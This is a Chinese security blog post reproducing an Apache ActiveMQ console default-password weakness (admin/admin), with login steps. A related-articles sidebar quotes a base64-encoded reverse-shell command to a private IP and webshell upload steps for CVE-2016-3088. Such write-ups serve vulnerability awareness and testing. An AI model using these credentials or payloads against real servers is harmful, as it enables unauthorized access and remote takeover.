Apache ActiveMQ Console 存在默认弱口令

已于 2023-08-22 12:12:55 修改
阅读量1.1k 收藏 1
点赞数 3
分类专栏: # 1. Web服务器漏洞 文章标签: web安全 渗透测试 代码审计 漏洞复现 红队攻防 漏洞分析 activemq
于 2023-05-08 08:00:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_48899364/article/details/130549004
版权

这个世界并不是掌握在那些嘲笑者的手中,而恰恰掌握在能够经受得住嘲笑与批评仍不断往前走的人手中。

漏洞描述

Apache ActiveMQ Console 存在默认弱口令 admin:admin,进入控制台后可被进一步恶意利用

漏洞影响

Apache ActiveMQ

漏洞复现

访问首页

http://x.x.x/index.html

如下

在这里插入图片描述

访问漏洞url:

http://x.x.x/admin

Apache ActiveMQ 默认开启了 8186 控制台,输入默认的账号密码admin/admin

在这里插入图片描述

登录成功

在这里插入图片描述文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。

免责声明:由于传播或利用此文所提供的信息、技术或方法而造成的任何直接或间接的后果及损失,均由使用者本人负责, 文章作者不为此承担任何责任。

转载声明:儒道易行 拥有对此文章的修改和解释权,如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经作者允许,不得任意修改或者增减此文章的内容,不得以任何方式将其用于商业目的。

CSDN:
https://blog.csdn.net/weixin_48899364?type=blog

公众号:
https://mp.weixin.qq.com/mp/appmsgalbum?__biz=Mzg5NTU2NjA1Mw==&action=getalbum&album_id=1696286248027357190&scene=173&from_msgid=2247485408&from_itemidx=1&count=3&nolastread=1#wechat_redirect

博客:
https://rdyx0.github.io/

先知社区:
https://xz.aliyun.com/u/37846

SecIN:
https://www.sec-in.com/author/3097

FreeBuf:
https://www.freebuf.com/author/%E5%9B%BD%E6%9C%8D%E6%9C%80%E5%BC%BA%E6%B8%97%E9%80%8F%E6%8E%8C%E6%8E%A7%E8%80%85
儒道易行
关注
  • 3
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
apache-activemq-5.17.3
12-27
apache-activemq,运行需要依赖的jdk版本为11+
activeMQ修改默认账户名和密码、默认端口
u010448530的博客
11-29 2757
1、针对未授权访问,修改conf/jetty.xml文件,bean id为securityConstraint下的authenticate修改值为true,重启服务即可(高版本基本都已设置为true) 2、针对弱口令问题,修改conf/jetty.xml文件,bean id 为securityLoginService下的conf值获取用户properties,修改用户名密码,重启服务即可 3、...
Centos 7 服务器Apache-ActiveMQ安装指南
10-08
虽然ActiveMQ目前已经不是开发时的主要消息中间件, 但是对于简单使用JMS的场景而言, ActiveMQ仍然是一个比较成熟、稳定的框架,可以供初学者、小微企业快速上手。 虽然Apache ActiveMQ目前有多种安装方式, 使用Docker 也可以快速获得本地测试环境,但是对于初学者而言, Docker 在提供方便性的同时, 也增加了Docker 技术的复杂性,对于初学者而言,并不能很好的聚焦于ActiveMQ本身。而且ActiveMQ虽然网络资源很多, 但是往往资料过于老旧,或者更多的集中于SpringBoot 和ActiveMQ的集成,对于如何把ActiveMQ安装和详细的端口配置,往往语焉不详, 对于Jetty Web管理端(admin)和具体的JMS 端口的用户密码配置,更是资料不够详细。有鉴于此,本文档可以指导用户逐步操作,只需要复制、粘贴即可,最终配置一个可以远程访问的ActiveMQ环境。 本文档提供了在CentOS7 中安装Apache ActiveMQ 5的操作指南,可以用来指导初级开发人员和企业运维人员搭建Apache MQ的开发、测试环境.
activemq-web-console-5.11.2
09-01
activemq-web-console默认使用方式是通过在activemq.xml中导入jetty.xml配置一个jetty server来实现的。其实activemq-web-console完全可以和activemq-broker分开来部署。 activemq-web-console包含3个apps, 1.一个是admin,用来显示和管理所有的queue、topic、connection等等。 2.一个是demo,有一些使用jms和activemq的简单例子。 3.还有一个fileserver,用来支持通过activemq发送文件时的中转服务器。blob message时配置的http文件服务器。
Apache activemq 5.15.5
10-28
阿帕奇的消息队列服务
2020最全弱口令常用口令大集合
09-26
2020最新的弱口令大集合,从top100,1000到top100000的密码,以及常见的从3位起到10位的弱口令,还有姓名拼音等多个弱口令字典,各种撞库等,数字亲测好用,大家快来下载吧,挺不错的一个资源哦!!
【CVE-2016-3088】 Activemq文件上传以及弱口令
Lazy_ass的博客
11-25 6432
CVE-2016-3088 PUT方法上传文件(自建环境) 漏洞描述: Apache ActiveMQ是美国阿帕奇(Apache)软件基金会的一套开源的消息中间件 Apache ActiveMQ 5.14.0之前5.x版本的Fileserver Web应用中存在安全漏洞。远程攻击者可通过发送HTTP PUT和HTTP MOVE请求利用该漏洞上传并执行任意文件 漏洞复现流程 1: 首先需要判断/fileserver目录是否具有访问权限 2: 访问/admin/test/systemProperties.js
CVE-2016-3088 ActiveMQ漏洞复现
zwj101010101010的博客
07-27 683
这个漏洞出现在fileserver应用中,原理就是fileserver支持写入文件但不解析jsp,同时支持MOVE请求移动文件,通过写入一个文件,然后利用移动请求移动到任意位置,导致任意文件写入漏洞。4、因为fileserver不解析,所以还需要使用MOVE请求来移动上传文件,移动的路径为/opt/activemq/webapps/api/,回显204成功。写入webshell,需要写在admin或api应用中,而这俩应用都需要登录才能访问。3、然后将GET修改为PUT,并在目录后加入想上传的数据包。...
【SAP Hana】XS应用管理控制台登录
XLevon的博客
11-20 915
完成第一个程序XS应用Hello World的开发后,可以登陆XS应用管理控制台查看。 URL:http://<SAP HANA 主机名 or IP地址>:80<实例号>/sap/hana/xs/admin/ 用户名和密码:对应SAP HANA数据库的用户名和密码。 问题现象:服务器拒绝了请求。 问题原因:该账号缺少相应的访问权限。 解决方案:需要在HANA Studio中为该用户添加以下sap.hana.xs.admin.roles::* (1)用管理员账号SY
[Vulhub] ActiveMQ漏洞
weixin_45605352的博客
01-10 3447
ActiveMQ 反序列化漏洞 (CVE-2015-5254) 0x00 漏洞描述 Apache ActiveMQ 是由美国 Pachitea(Apache)软件基金会开发的开源消息中间件,支持 Java 消息服务、集群、Spring 框架等。 Apache ActiveMQ 5.13.0 之前的 5.x 版本安全漏洞,该程序造成的漏洞不限制代理中可以序列化的类。远程攻击者可以制作一个特殊的序列化Java Message Service (JMS) ObjectMessage 对象,利用该漏洞执行任意代码。
activemqApache ActiveMQ的镜像
01-31
欢迎使用Apache ActiveMQ Apache ActiveMQ是高性能的Apache 2.0许可的Message Broker和JMS 1.1实现。 入门 为了帮助您入门,请尝试以下链接: 入门 建造 例子 我们欢迎您提供各种帮助,以获取有关如何帮助详细信息 请访问该网站以获取有关问题跟踪器,电子邮件列表,Wiki或IRC频道的详细信息,网址为 请帮助我们使Apache ActiveMQ更好-我们感谢您的任何反馈。 请享用! 发牌 该软件已根据您在此目录中名为“ ”的文件中可能找到的条款获得。 此发行版包括加密软件。 您当前居住的国家/地区可能对加密软件的进口,拥有,使用和/或再出口到另一个国家有限制。 在使用任何加密软件之前,请检查您所在国家关于导入,拥有,使用和再导出加密软件的法律,法规和政策,以查看是否允许这样做。 有关更多信息,请参见 。 美国政府商务部工业和安全局(BIS)已将此软件归类为出口商品控制号(ECCN)5D002.C.1,其中包括使用或执行具有非对称算法的加密功能的信息安全软件。 该Apache Software Foundation分
apache-activemq-5.16.0.zip
09-11
apache-activemq-5.16.0.zip
activemq漏洞合集
weixin_46626737的博客
07-02 508
{echo,L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguMTAuMjEyLzIyMzMgMD4mMQ==}|{base64,-d}|{bash,-i}" -Yp ROME 目标地址 61616。http://192.168.110.129:8161/admin/test/systemProperties.jsp查看物理路径。上传显示204,成功,但是该路径下没有解析权限,所以需要使用MOVE方法进行移动到正常的物理路径。弱口令:admin/admin/
ActiveMQ 任意文件上传漏洞复现
YJ_12340的博客
04-15 457
​ 访问 http://ip:8161/admin/ 进入admin登陆页面,使用弱口令登陆,账号密码皆为 admin,登陆成功后,headers中会出现验证信息。​ 将GET协议修改为PUT协议,将文件上传至 fileserver 目录下。​ 同样的,响应包返回的状态码为 204,代表文件成功移动到 api 目录下。​ 继续修改请求包协议为 MOVE,并在头部中添加 Destination。​ 如上图,response 包中返回状态码为 204,即文件上传成功。
ActiveMQ默认的用户名密码
龙卷风摧毁停车场
02-23 2598
再次进行默认密码测试,无法登陆。
ActiveMQ漏洞总结
qq_42176207的博客
05-08 7513
ActiveMQ Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。随着中间件的启动,会打开两个端口,61616是工作端口,消息在这个端口进行传递;8161是Web管理页面端口。 Jetty 是一个开源的 servlet 容器,它为基于 Java 的 web 容器,例如 JSP 和 servlet 提供运行环境。ActiveMQ 5.0 及以后版本默认集成了jetty。在启动后提供一个监控 Ac
ActiveMQ详解
一个老鸟的学习之路
06-06 5674
消息的成功消费通常包含三个阶段:客户接收消息、客户处理消息和消息被确认。针对某个主题(Topic)的订阅者,它必须创建一个订阅者之后,才能消费发布者的消息,而且为了消费消息,订阅者必须保持运行的状态。具有一个独特的非中间件的模式,你不需要安装和运行一个消息服务器或中间件,因为你的应用程序将扮演了这个服务角色。如果事务回滚,则消息会被再次传送。JMS是java的消息服务,JMS的客户端之间可以通过JMS服务进行异步的消息传输。的一样的日志数据和离线分析系统,但又要求实时处理的限制,这是一个可行的解决方案。
红队攻防ActiveMQ漏洞集锦
众生度尽,方证菩提
12-07 799
要么拼命,要么滚回去
【网络安全安全事件管理处置 — 安全事件处置思路指导
最新发布
享你所想
04-26 665
一、处理DDOS事件 1.准备工作 2.预防工作 3.检测与分析 4.限制、消除 5.证据收集 二、处理恶意代码事件 1.准备 2.预防 3.检测与分析 4.限制 5.证据收集 6.消除与恢复 三、处理未授权访问事件 1.准备 2.预防 3.检测与分析 4.限制、消除 5.证据收集 6.恢复 四、处理复合型安全事件 1.建议
activemq console显示error
06-10
如果 ActiveMQ 的控制台显示错误,可能是由于多种原因引起的。以下是一些可能的原因和解决方法: 1. 确保 ActiveMQ 服务器正在运行。您可以通过在命令行中运行 "activemq status" 命令来检查服务器的状态。 2. ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值